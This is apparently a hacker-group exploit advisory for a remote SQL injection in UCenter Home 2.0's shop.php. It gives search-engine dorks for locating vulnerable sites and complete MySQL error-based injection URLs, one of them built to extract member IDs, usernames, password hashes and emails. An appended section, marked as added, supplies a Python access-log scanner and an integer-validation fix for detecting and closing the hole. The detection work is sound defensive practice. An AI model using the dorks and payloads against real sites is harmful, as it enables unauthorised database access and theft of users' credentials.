__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okey.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
Use hex conversion and edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
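Added example, not part of the original advisory: a log check for requests of the kind shown above, for reviewing whether a UCenter Home 2.0 site has received them. It assumes a legitimate shopid is always a plain integer and that the web server writes common/combined-format access logs; the sample log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Substrings characteristic of the MySQL error-based requests in the advisory.
SQLI_MARKERS = ("information_schema", "floor(rand(", "group by")
# Request target from a common/combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, shortened query).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /space.php?uid=1 HTTP/1.1" 200 900',
]

def check_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/shop.php"):
        return []
    findings = []
    # parse_qs percent-decodes, so URL-encoded payloads are matched too.
    for value in parse_qs(parts.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate shopid is a plain integer
        findings.append("non-numeric shopid")
        findings += ["marker:" + m for m in SQLI_MARKERS if m in value.lower()]
    return findings

def scan(lines):
    """Return (line_number, findings) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = check_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same integer-only rule, enforced in shop.php before the value reaches the query, closes the hole the advisory describes.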